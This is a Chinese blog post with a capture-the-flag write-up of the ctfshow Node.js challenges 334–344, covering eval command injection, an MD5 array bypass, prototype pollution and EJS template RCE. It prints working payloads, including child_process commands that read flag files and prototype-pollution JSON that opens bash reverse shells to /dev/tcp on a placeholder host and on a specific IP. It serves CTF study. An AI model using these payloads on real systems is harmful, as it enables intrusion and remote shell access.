ctfshow nodejs

最新推荐文章于 2024-07-19 16:23:12 发布
最新推荐文章于 2024-07-19 16:23:12 发布
阅读量736 收藏 4
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/121351854
版权

前言

文档先阅读一遍

Node.js 教程 | 菜鸟教程 (runoob.com)

常见漏洞

Node.js 常见漏洞学习与总结 - 先知社区 (aliyun.com)

nodejs一些入门特性&&实战 - 先知社区 (aliyun.com)

原型链污染

深入理解 JavaScript Prototype 污染攻击 | 离别歌 (leavesongs.com)

模板引擎rce

XNUCA2019 Hardjs题解 从原型链污染到RCE - 先知社区 (aliyun.com)

再探 JavaScript 原型链污染到 RCE - 先知社区 (aliyun.com)

几个node模板引擎的原型链污染分析 | L0nm4r (lonmar.cn)

ctfshow nodejs篇 - TARI TARI

334


变大写操作


传小写 ctfshow 123456即可

335-336-系统命令

Node.js中的chile_process.exec调用的是/bash.sh,它是一个bash解释器,可以执行系统命令。
在eval函数的参数中可以构造require('child_process').exec('');来进行调用。


发现返回的是 [object Object]

查看文档:

child_process 子进程 | Node.js API 文档 (nodejs.cn)

发现exec返回的是


通过查找所有可替换用法 execSync spawnSync

spawnSync():

Payload:

法一:系统命令
?eval=require('child_process').execSync('ls').toString();
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).output;
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout;
?eval=global.process.mainModule.constructor._load('child_process').exec('ls');

法二:
文件操作
?eval=require('fs').readdirSync('.');
?eval=require('fs').readFileSync('fl001g.txt');

Node.js 文件系统模块 (nodejs.cn)

法三 拼接
'+' 要urlencode一下
?eval=var a="require('child_process').ex";var b="ecSync('ls').toString();";eval(a%2Bb); 
?eval=require('child_process')['ex'%2B'ecSync']('cat f*')

367-md5

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
  
});

module.exports = router;

数组绕过?a[]=1&b[]=1

368-原型链污染

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }
});

前面有一个copy函数,可以与链接文章里面的merge函数类比

污染 user 让secert.ctfshow为36dboy

Payload:

{"username":"1","password":"1","__proto__":{"ctfshow":"36dboy"}}

339

这里让输入flag所以没法直接利用了

非预期

ejs rce


Ejs引擎可以rce ,具体过程参考上面链接

Payload:

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}

先污染一下 outputFunctionName


访问一下调用渲染,反弹shell

预期解


污染query参数 再利用Function反弹shell


污染点在user 触发点在query
/login下污染query


/api下触发query


Payload:

{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2334 0>&1\"')"}}

340

触发点还是query
但是污染点不一样了


user.userinfo向上污染两级才是Object对象

payload:

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2334 0>&1\"')"}}}

341

没了api 那就用ejs的rce

342-343

具体过程分析参考前言模板rce

payload:

{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2333 0>&1\"')"}}}

content-type要改为application/json

344

router.get('/', function(req, res, next) {
 res.type('html');
 var flag = 'flag_here';
 if(req.url.match(/8c|2c|\,/ig)){
 	res.end('where is flag :)');
 }
 var query = JSON.parse(req.query.query);
 if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
 	res.end(flag);
 }else{
 	res.end('where is flag. :)');
 }

});

即 url 中不能包含大小写 8c、2c 和 逗号

nodejs 会把同名参数以数组的形式存储,并且 JSON.parse 可以正常解析


paylaod:

?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}

引号url编码为%22与c形成%22c匹配正则,所以编码c

Blazing-Angel
关注
专栏目录
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTF 在Nodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
nodejs插件:Jenkins nodejs插件
02-03
Jenkins的NodeJS插件 为NodeJS和npm软件包提供Jenkins集成。 下载与安装 您可以下载并从“管理插件”菜单安装它,或直接从“插件更新中心”安装此插件。 主要特点 提供NodeJS自动安装程序,可以根据需要创建任意...
CTFSHOW-nodejs
Yb_140的博客
05-13 872
web334 下载附件,添加后缀 .zip,之后打开,发现有两个文件login.js和user.js 发现用户名和密码 用户名不能为CTFSHOW 其中toUpperCase()函数为转为大写 所以输入的用户名为ctfshow,密码为123456 得到flag web335 查看页面源代码,发现 可能为GET传参,命令执行 在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是F.
NODEJS复习(ctfshow334-344)
m0_74402888的博客
07-19 1399
判断secert.ctfshow==='36dboy'时,找不到ctfshow,会从Object里面找。return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});Function(query)(query)可以执行query对应的指令,我们可以使用变量覆盖,将query的值作为。
CTFshow——Node.js
D.MIND 的博客
05-19 914
require() 用于引入模块、 JSON、或本地文件 // 引入本地模块: const myLocalModule = require('./path/myLocalModule'); // 引入 JSON 文件: const jsonData = require('./path/filename.json'); // 引入 node_modules 模块或 Node.js 内置模块: const crypto = require('crypto'); 334 user.js中有登录的账号密码,但
CTFshow nodejs
starttv的博客
11-19 652
​Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。 Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs 在前端也大放异彩,带来了 Web 前端开发的革命。
CTFSHOW nodejs
羽的博客
02-18 6980
web334 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。 所以用ctfſhow 123456登录就可以出flag了 web335 require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString() web336 require( 'child_process' ).spawnSync( 'ls
opencv4nodejsNodejs绑定到OpenCV 3和OpenCV 4
02-03
opencv4nodejs opencv4nodejs允许您在nodejs中使用本机OpenCV库。 除了同步API外,该软件包还提供了一个异步API,使您可以构建非阻塞和多线程计算机视觉任务。 opencv4nodejs支持OpenCV 3和OpenCV 4。 该项目的...
nodejs14.9.0
10-30
nodejs14.9.0
nodejs-nodejs
最新发布
09-25
nodejs javascript demo nodejs nodejs nodejs nodejs nodejs
ctfshow Nodejs
weixin_63231007的博客
03-08 761
承接上文nodejs原型链漏洞刷题练习
ctfshow_nodejs
qq_45951598的博客
03-13 421
这里写目录标题web334web335方法一方法二web336 web334 打开题目下载源码 打开longin.js var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ r
ctfshow nodejs
fmyyy1的博客
07-16 1066
334 源码给了 登录成功就能拿到flag var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
【CTFSHOW】web入门 NodeJS
7ruth0hn的博客
10-04 852
文章目录写在前面web334web335web336web337web338web339参考资料 写在前面 web334 下载附件,其中user.js得到用户名为: CTFSHOW 密码为: 123456 审计login.js代码,其中: return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; 得到name不能为“CTFSHOW”,但只要
ctfshow node.js专题
akxnxbshai的博客
12-02 547
学习一下node,js。
Ctfshow web入门 nodejs篇 web334-web344
Jay17的博客
07-06 1844
Ctfshow web入门 nodejs篇 web334-web344
ctfshow-nodejs
qq_63928796的博客
12-29 256
这里就是原型链污染,参考:https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x02-javascript。只要满足secert.ctfshow==='36dboy’就可以了,前面有一个copy函数,可以与链接文章里面的merge函数类比.附件给了user.js和login.js,user.js告诉了用户名和密码。和上一题一样,但上一题的payload不能用了。a 和 b 的长度相等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值